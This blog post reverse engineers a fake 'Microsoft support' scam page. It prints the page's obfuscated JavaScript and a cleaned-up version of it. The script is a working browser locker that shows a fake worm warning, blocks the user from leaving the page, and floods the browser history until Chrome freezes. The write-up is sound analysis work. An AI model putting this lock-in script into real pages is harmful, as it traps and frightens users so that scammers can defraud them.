Benedikt Bitterli

Reverse Engineering a Malicious Scam Script

A few days ago I was browsing the web and landed on a website with a malicious ad. Although malicious ads are not uncommon, this one managed to slip past my adblocker and immediately redirected me to a website that looked like this:

[Screenshot of the scam page]

Audio started blaring, and a robotic voice told me my computer was infected and I would lose all my data if I didn't call Microsoft technical support. A modal dialog prevented me from leaving, the URL bar started growing and eventually my browser froze completely. Definitely an impressive display!

Of course, my computer was not infected with malware. The "RDN/YahLover.worm" referenced by the website is fictional, and is part of a series of online scams that try to coax victims into believing their computer has been infected by a virus and can only be fixed by calling a toll-free hotline. The "Microsoft certified" technician on the phone will then "fix" the affected computer for a fee and/or talk the user into installing actual malware. A writeup by Malwarebytes has a nice compilation of variations of this scam found around the web.

Being somewhat familiar with computers, I didn't try to call the hotline to have a technician fix my computer. Even if I had wanted to, I would have been met with slight difficulty: the scammer forgot to put down a phone number to call. However, I was still left feeling very uneasy - my browser froze completely, and it wasn't unthinkable that the website could have used a Chrome exploit to drop actual malware on my system. To make myself feel more at ease (and because I was curious), I decided to dig into the inner workings of this scam website.

Identifying the website origin

The scammer in this case didn't bother to register a domain name and redirects victims directly to an IPv4 address. To my surprise, a geoIP lookup revealed that the origin server was not hosted in a country with loose internet laws, but was in fact US-based:

[Screenshot of the geoIP lookup result]

The website was hosted by DigitalOcean, a popular cloud provider - even scammers seem to have embraced the power of The Cloud™! Luckily DigitalOcean provides an email address to report abuse, and I've contacted them about the offending website. At the time of writing they have not yet responded, but they will likely take appropriate action.

Analysing the website

With DigitalOcean notified, it was time to take a look at the website itself. I wanted to confirm whether my machine could have been compromised, and I was also curious to see how a scam website is built.

The first step in this process is to download a local copy of the website so we can inspect it in peace. Since browsers have the nasty habit of rendering and executing all websites they retrieve, we instead turn to wget to download a copy of the offending site.

Interestingly, this did not work: a straightforward wget call hangs forever. After some probing, I figured out that the problem was the user agent, a short string that an HTTP client sends to a web server to identify the software making the request. By default, wget identifies itself to the server as Wget/1.19.1. What if we instead pretend to be a Chrome browser? wget allows us to specify the user agent it sends to the server, so let's try this one:

Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36

And lo, the server responds with the data we're looking for. I'm not sure whether this is an attempt at frustrating analysis of the site, or whether this is a standard crawler countermeasure, but it's interesting nonetheless.
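The same trick can be sketched outside of wget. The snippet below is only an illustration, assuming Node.js 18 or later (which ships a global fetch). The function names and the placeholder address are hypothetical, since the real address is not given here, and nothing is downloaded unless downloadPage is actually called.

```javascript
// Hypothetical placeholder from the documentation address range (TEST-NET-3);
// the scam site's real address is not reproduced in this article.
const PLACEHOLDER_URL = 'http://203.0.113.10/';

// The browser-like user agent string quoted above.
const CHROME_USER_AGENT =
  'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) ' +
  'Chrome/41.0.2224.3 Safari/537.36';

// Build request options that announce the given user agent to the server.
function buildRequestOptions(userAgent) {
  return { method: 'GET', headers: { 'User-Agent': userAgent } };
}

// Fetch the page as text without rendering or executing it.
// Assumes the global fetch available in Node.js 18+.
async function downloadPage(url, userAgent) {
  const response = await fetch(url, buildRequestOptions(userAgent));
  return response.text();
}

// Usage (not executed here):
// downloadPage(PLACEHOLDER_URL, CHROME_USER_AGENT).then(console.log);
```

As with wget, the point is that the response arrives as plain text, so none of the page's scripts run while we inspect it.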

Looking at the downloaded files reveals a surprisingly lightweight site structure:

├── files
│   ├── defender.png
│   ├── fake_close.png
│   └── Texts.mp3
└── index.html

defender.png is a Microsoft-like logo used to add some legitimacy to the website. fake_close.png is used in the background message box as a close icon that, as the name suggests, doesn't actually work:

[Screenshot of the fake message box with its close icon]

Texts.mp3 is an audio file produced by a text-to-speech program, which warns you about the terrible consequences of leaving the website and not calling the scam support hotline. Originally I assumed the website was using an obscure text-to-speech feature in my browser to produce the audio, but it turns out it's simply an MP3 file placed in an HTML5 audio tag. It's worth reproducing the file here for its entertainment value:

[Embedded audio: Texts.mp3]

Poking at the source code

With the files out of the way, let's take a look at the source of the site itself. The index.html file starts like this:

<!-- Works on Chrome and FF -->
<!DOCTYPE html>
<html>
  <head>
    <meta name="robots" content="noindex, nofollow">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Security Warning</title>
    <meta name="robots" content="NOINDEX,NOFOLLOW">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js">
    </script>

There are a few interesting things here. Most of the code is unobfuscated and nicely formatted. The authors even left a helpful comment to note that it has been tested to work on Chrome and Firefox. Additionally, the authors do not want this site to be indexed by search engines - so much so that the robots meta tag is added twice. Finally, the inclusion of jQuery reveals the site author to be an experienced web developer, especially since none of the JS on the site actually uses jQuery. Interestingly, the particular version of jQuery used here is 18 months out of date.

Then follow approximately 130 lines of standard HTML and inline CSS to set up the blue background message and the fake message box. The bottom of the file is where things get interesting. The first thing we find is a Google Analytics tracking script:

<script>
 (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
 (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
 m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
 })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

 ga('create', 'UA-99222626-1', 'auto');
 ga('send', 'pageview');
</script>

I can only speculate, but this is presumably how the scammers measure the amount of traffic driven to their site, and possibly even the conversion rate of visitors to phone calls.

The most interesting piece of JS is found at the very bottom of the site. It has been deliberately obfuscated and appears to be responsible for how the site behaves. Let's take a look:

var text = '*************************************************\nInternet Security Alert! Code: 055BCCAC9FEC\n ************************************************* \n\nInternet Security Alert: Your Computer Might Be Infected By Harmful Viruses \nPlease Do Not Shut Down or Reset Your Computer.\n\nThe following data might be compromised if you continue:\n1. Passwords\n2. Browser History\n3. Credit Card Information\n4. Local Hard Disk Files\n\nThese viruses are well known for identity and credit card theft. Further action on this computer or any other device on your network might reveal private information and involve serious risks.\n\n Call Windows Technical Support:  (Toll Free)';
var _0x45bf=['\x70\x75\x73\x68\x53\x74\x61\x74\x65','\x6f\x6e\x62\x65\x66\x6f\x72\x65\x75\x6e\x6c\x6f\x61\x64','\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x52\x44\x4e\x2f\x59\x61\x68\x4c\x6f\x76\x65\x72\x2e\x77\x6f\x72\x6d\x21\x30\x35\x35\x42\x43\x43\x41\x43\x39\x46\x45\x43\x20\x49\x6e\x66\x65\x63\x74\x69\x6f\x6e\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x0a','\x72\x65\x74\x75\x72\x6e\x56\x61\x6c\x75\x65','\x6f\x6e\x6c\x6f\x61\x64','\x74\x6f\x53\x74\x72\x69\x6e\x67'];(function(_0x5954e7,_0x10ca6d){var _0x4d8f25=function(_0x3abcd2){while(--_0x3abcd2){_0x5954e7['\x70\x75\x73\x68'](_0x5954e7['\x73\x68\x69\x66\x74']());}};_0x4d8f25(++_0x10ca6d);}(_0x45bf,0x145));var _0xf45b=function(_0xc97b12,_0x180ff3){_0xc97b12=_0xc97b12-0x0;var _0x2933ba=_0x45bf[_0xc97b12];return _0x2933ba;};function ch(_0x454dc6){window[_0xf45b('0x0')]=function(_0x4a502f){var _0x2e1ee7=_0xf45b('0x1')+_0x454dc6;_0x4a502f[_0xf45b('0x2')]=_0x2e1ee7;return _0x2e1ee7;};window[_0xf45b('0x3')]=function(){if(confirm('\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x52\x44\x4e\x2f\x59\x61\x68\x4c\x6f\x76\x65\x72\x2e\x77\x6f\x72\x6d\x21\x30\x35\x35\x42\x43\x43\x41\x43\x39\x46\x45\x43\x20\x49\x6e\x66\x65\x63\x74\x69\x6f\x6e\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x0a'+_0x454dc6)){var _0x5a0f53='';for(var 
_0x2f7f0c=0x0;_0x2f7f0c<0x5f5e100;_0x2f7f0c++){_0x5a0f53=_0x5a0f53+_0x2f7f0c[_0xf45b('0x4')]();history[_0xf45b('0x5')](0x0,0x0,_0x5a0f53);}}else{var _0x5a0f53='';for(var _0x2f7f0c=0x0;_0x2f7f0c<0x5f5e100;_0x2f7f0c++){_0x5a0f53=_0x5a0f53+_0x2f7f0c[_0xf45b('0x4')]();history[_0xf45b('0x5')](0x0,0x0,_0x5a0f53);}}};}ch(text);

Deobfuscating the JS snippet

Let's break this into pieces. The first part of the script is a piece of unobfuscated text that controls the contents of the popup dialog. Presumably this allows easy editing of the message in the future (such as adding the phone number).

Following the message text is an array of strings. Let's add some whitespace formatting and see what we are dealing with:

var _0x45bf = [
  '\x70\x75\x73\x68\x53\x74\x61\x74\x65',
  '\x6f\x6e\x62\x65\x66\x6f\x72\x65\x75\x6e\x6c\x6f\x61\x64',
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a' +
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a' +
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x52\x44\x4e\x2f\x59\x61\x68\x4c\x6f\x76\x65\x72' +
  '\x2e\x77\x6f\x72\x6d\x21\x30\x35\x35\x42\x43\x43\x41\x43\x39\x46\x45\x43\x20\x49\x6e' +
  '\x66\x65\x63\x74\x69\x6f\x6e\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a' +
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a' +
  '\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0a\x0a',
  '\x72\x65\x74\x75\x72\x6e\x56\x61\x6c\x75\x65',
  '\x6f\x6e\x6c\x6f\x61\x64',
  '\x74\x6f\x53\x74\x72\x69\x6e\x67'
];

These are definitely strings, but they look like gibberish at first. What is happening here is that every character has been encoded using a hexadecimal escape sequence of the form \xNN. The JS interpreter will happily parse these and turn them back into characters, but for humans they are quite hard to decipher. However, with a bit of Python we can quickly deobfuscate these strings:

var _0x45bf = [
    'pushState',
    'onbeforeunload',
    '*************************************************\n' +
    'RDN/YahLover.worm!055BCCAC9FEC Infection\n' +
    '*************************************************\n\n',
    'returnValue',
    'onload',
    'toString'
];

We can quickly see that these are names of JS methods and properties, as well as the name of the fictional worm infection. It's worth mentioning here that the script uses very peculiar variable names such as _0x45bf to make analysis more inconvenient. These are deliberately picked to look like hex constants, but they're really just identifiers - the leading underscore makes sure they are parsed as such by the JS interpreter. In the following I will rename these identifiers to more readable variable names, with a rough guess based on how they're used.
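The string decoding step was done in Python, and that script is not reproduced here. As a rough equivalent, here is a minimal JavaScript sketch of the same idea, assuming the obfuscated source is available as raw text. The function name decodeHexEscapes is my own for illustration.

```javascript
// Replace every \xNN escape in a piece of raw source text with the
// character it encodes. This is a sketch: it does not re-escape
// characters such as newlines or quotes, so the output is meant for
// reading rather than for pasting back into a string literal.
function decodeHexEscapes(source) {
  return source.replace(/\\x([0-9a-fA-F]{2})/g, (match, hex) =>
    String.fromCharCode(parseInt(hex, 16))
  );
}

// String.raw keeps the backslashes literal, the way they would appear
// in the downloaded index.html.
const encoded = String.raw`\x70\x75\x73\x68\x53\x74\x61\x74\x65`;
console.log(decodeHexEscapes(encoded)); // pushState
```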

After the array of strings follows an anonymous function that is immediately called. Let's take a look:

(function(_0x5954e7,_0x10ca6d){ 
    var _0x4d8f25 = function(_0x3abcd2) {
        while(--_0x3abcd2) {
            _0x5954e7['\x70\x75\x73\x68'](_0x5954e7['\x73\x68\x69\x66\x74']());
        }
    };
    _0x4d8f25(++_0x10ca6d);
}(_0x45bf,0x145));

As before, I have formatted the script to make it a bit more readable.

We can see that the pattern of obscure variable names continues. A new pattern we will see a lot of is expressions of the form _0x5954e7['\x70\x75\x73\x68']() (after deobfuscation: list['push']()). These are in fact method calls. JS is peculiar in that objects are a lot like dictionaries, and a call of the form foo['bar']() is fully equivalent to foo.bar(). Although the former is valid, you would rarely encounter it in normal JS code, and it works as an added layer of obfuscation.
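To make the equivalence concrete, here is a small sketch with made-up array contents. It compares the bracket style used by the obfuscator with the conventional dot style, and shows that the escaped property name is just the plain string 'push'.

```javascript
// Bracket notation, as used in the obfuscated script.
const viaBrackets = ['a', 'b'];
viaBrackets['push'](viaBrackets['shift']());

// Conventional dot notation doing exactly the same thing.
const viaDots = ['a', 'b'];
viaDots.push(viaDots.shift());

// The escaped name is an ordinary string once the interpreter parses it.
const escapedName = '\x70\x75\x73\x68';

console.log(viaBrackets, viaDots, escapedName === 'push');
```

Both arrays end up with their first element moved to the back, and the final comparison evaluates to true.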

After renaming the variables, deobfuscating the strings and converting the method calls, we get this more readable version:

(function(list, N) { 
    var rotateList = function(NplusOne) {
        while(--NplusOne) {
            list.push(list.shift());
        }
    };
    rotateList(++N);
}(stringList, 325));

The sole purpose of this function is to shuffle the list of strings we've seen earlier. The inner loop repeatedly calls list.push(list.shift()). In JS, shift removes the front element of a list, and push adds it to the back. In other words, one loop iteration simply rotates all entries one to the left.

The function call applies this to the string list and rotates it 325 times. Since the string list has 6 elements, we will get back the original list after 6 rotations. We can see that 325 mod 6 = 1, meaning that all this piece of code does is rotate the strings one entry to the left. The string list then looks like this:

var shuffledStringList = [
    'onbeforeunload',
    wormName,
    'returnValue',
    'onload',
    'toString',
    'pushState'
];

I've shortened the string identifying the malware to wormName to make things less busy.
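The rotation argument is easy to check by hand, but it can also be verified with a few lines of code. The sketch below uses a helper name of my own, rotateLeft, and a placeholder string in place of the worm name. It confirms that 325 rotations of a six-element list give the same result as a single rotation.

```javascript
// Rotate a copy of the list to the left `count` times, using the same
// push(shift()) step as the obfuscated script.
function rotateLeft(list, count) {
  const copy = list.slice();
  for (let i = 0; i < count; i++) {
    copy.push(copy.shift());
  }
  return copy;
}

// 'wormName' stands in for the long worm name string.
const original = [
  'pushState', 'onbeforeunload', 'wormName',
  'returnValue', 'onload', 'toString'
];

const after325 = rotateLeft(original, 0x145);          // 0x145 is 325
const afterOne = rotateLeft(original, 325 % original.length);

console.log(after325);
console.log(JSON.stringify(after325) === JSON.stringify(afterOne)); // true
```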

After shuffling, the script then defines this function:

var _0xf45b=function(_0xc97b12,_0x180ff3) {
    _0xc97b12=_0xc97b12-0x0;
    var _0x2933ba=_0x45bf[_0xc97b12];
    return _0x2933ba;
};

Amusingly, hex constants are used whenever possible, even when it's completely pointless: One example here is 0x0.

Let's look at the deobfuscated version:

function indexStringList(idx) {
    idx = idx - 0;
    var result = shuffledStringList[idx];
    return result;
};

This function is quite simple: it just returns the entry of the shuffledStringList array at the specified index. As an additional indirection, the index is passed in as a string and converted to a number using the expression idx = idx - 0;. This works due to a peculiarity of JS: the subtraction operator automatically converts string operands to numbers, and a string such as '0x1' is parsed as a hexadecimal literal.
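A short sketch of this coercion, with variable names chosen only for illustration. Note that the trick depends on subtraction: the + operator would concatenate instead of converting.

```javascript
// Subtraction converts the string operand to a number; a '0x' prefix
// is read as hexadecimal.
const indexOne = '0x1' - 0;
const indexFive = '0x5' - 0;

// Addition with a string operand concatenates instead.
const concatenated = '0x1' + 0;

console.log(indexOne, indexFive, concatenated); // 1 5 0x10
```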

What follows is the main entry function of the script. After reformatting, it looks like this:

function ch(_0x454dc6){
  window[_0xf45b('0x0')] = function(_0x4a502f){
    var _0x2e1ee7=_0xf45b('0x1')+_0x454dc6;
    _0x4a502f[_0xf45b('0x2')]=_0x2e1ee7;
    return _0x2e1ee7;
  };
  window[_0xf45b('0x3')] = function() {
    if(confirm(wormName+_0x454dc6)){
      var _0x5a0f53='';
      for (var _0x2f7f0c=0x0;_0x2f7f0c<0x5f5e100;_0x2f7f0c++) {
        _0x5a0f53=_0x5a0f53+_0x2f7f0c[_0xf45b('0x4')]();
        history[_0xf45b('0x5')](0x0,0x0,_0x5a0f53);
      }
    } else {
      var _0x5a0f53='';
      for (var _0x2f7f0c=0x0;_0x2f7f0c<0x5f5e100;_0x2f7f0c++) {
        _0x5a0f53=_0x5a0f53+_0x2f7f0c[_0xf45b('0x4')]();
        history[_0xf45b('0x5')](0x0,0x0,_0x5a0f53);
      }
    }
  };
}
ch(text);

The first thing we notice are a lot of calls of the form _0xf45b('0x0'). These are calls to the indexStringList function we looked at earlier. We already know that these simply return entries from the shuffled string list, so we can directly replace them with their final value; _0xf45b('0x0') becomes onbeforeunload and so forth.

Similar to before, this code also uses expressions of the form window[_0xf45b('0x0')], which are obfuscated accesses to properties of the global window object; here they are used to assign the onbeforeunload and onload event handlers. With these transformations in mind, we can now rewrite the code into its final deobfuscated form:

function main(messageBody) {
    window.onbeforeunload = function(event) {
        var dialogText = wormName + messageBody;
        event.returnValue = dialogText;
        return dialogText;
    };
    window.onload = function() { 
        if (confirm(wormName + messageBody)) {
            var url = '';
            for (var i = 0; i < 100000000; i++) {
                url = url + i.toString();
                history.pushState(0, 0, url);
            }
        } else {
            var url = '';
            for (var i = 0; i < 100000000; i++) {
                url = url + i.toString();
                history.pushState(0, 0, url);
            }
        }
    };
}
main(text);

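This allows us to decipher the purpose of this JS snippet. It does three things:

1. When the page loads, it opens a modal confirm dialog showing the fake infection warning.
2. Whichever button is clicked, it enters a loop of 100 million iterations that keeps appending digits to the URL and pushes each new URL onto the browser history.
3. When the user tries to leave the page, the onbeforeunload handler asks the browser to show another dialog with the same warning.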

With all obfuscation removed, we arrive at a remarkably simple script. Its main purpose is to deliver a scary sounding message and make sure the user stays on the website long enough to read it (and, hopefully, call the number).

Reassuringly, this script was not capable of dropping actual malware on my machine. We can now also see the reason why my browser froze: Absurdly long URLs and spamming the history object are two things Chrome does not handle well.
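To get a feeling for how absurd these URLs become, we can compute the length of the string the loop builds without touching the history API. The sketch below uses a helper name of my own, urlLengthAfter, and only counts the characters the script would try to append. Whether a browser actually accepts or stores URLs of that size is a separate question that this does not answer.

```javascript
// Length of the string built by appending i.toString() for every i in
// [0, iterations). Numbers are counted in ranges that share a digit
// count, so the full loop never has to be run.
function urlLengthAfter(iterations) {
  let total = 0;
  let digits = 1;
  let rangeStart = 0;   // first number in the current digit range
  let rangeEnd = 10;    // exclusive upper bound of that range
  while (rangeStart < iterations) {
    const upper = Math.min(rangeEnd, iterations);
    total += (upper - rangeStart) * digits;
    rangeStart = rangeEnd;
    rangeEnd *= 10;
    digits += 1;
  }
  return total;
}

console.log(urlLengthAfter(1000));      // 2890
console.log(urlLengthAfter(100000000)); // 788888890
```

After only a thousand iterations the URL is already close to 3,000 characters long, and every iteration adds another history entry on top of that.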

Closing Remarks

Even though tech hotline scams are relatively low tech compared to proper malware attacks, a surprising amount of effort went into obfuscating the JS script on the site. The simplified script comes in at fewer than 30 lines, but took a couple of hours to reverse engineer. Together with the lightweight site structure and cleanly formatted code, this tempts me to believe it was written by someone surprisingly competent at web development. I can only guess why they forgot to add a phone number to actually make the scam work - either it was a crucial oversight, or what I saw was only an early test version of what will later become a proper scam site.

Something that is slightly disappointing is to see how little JS it takes to actually set this up, and how easy it is to make a browser completely unusable to the point where we can't leave a website and need to restart. Given the amount of ads delivered every day and how easy it is to sneak in 30 lines of JS somewhere, I'm surprised this does not happen more often.

Either way, this was a fun project to spend a few hours on. Next time you land on a scam site, why not poke around at its source and see how it works? You might learn something interesting.

Update 8/25/2017: The JS appears to have been obfuscated by an automated JavaScript obfuscator.